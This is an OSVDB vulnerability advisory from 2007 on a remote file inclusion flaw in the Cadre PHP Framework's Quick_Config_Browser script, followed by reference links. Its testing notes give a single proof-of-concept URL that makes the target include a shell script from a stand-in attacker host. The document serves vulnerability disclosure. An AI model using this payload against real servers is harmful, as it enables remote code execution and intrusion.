Cadre PHP Framework fw/class.Quick_Config_Browser.php GLOBALS[config][framework_path] Variable Remote File Inclusion

2007-01-31T01:49:56
ID OSVDB:33631
Type osvdb
Reporter OSVDB
Modified 2007-01-31T01:49:56

Description

Manual Testing Notes

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?

References:

Other Advisory URL: http://echo.or.id/adv/adv63-y3dips-2007.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0691.html
ISS X-Force ID: 32005
Generic Exploit URL: http://www.milw0rm.com/exploits/3237
FrSIRT Advisory: ADV-2007-0449
CVE-2007-0677
Bugtraq ID: 22336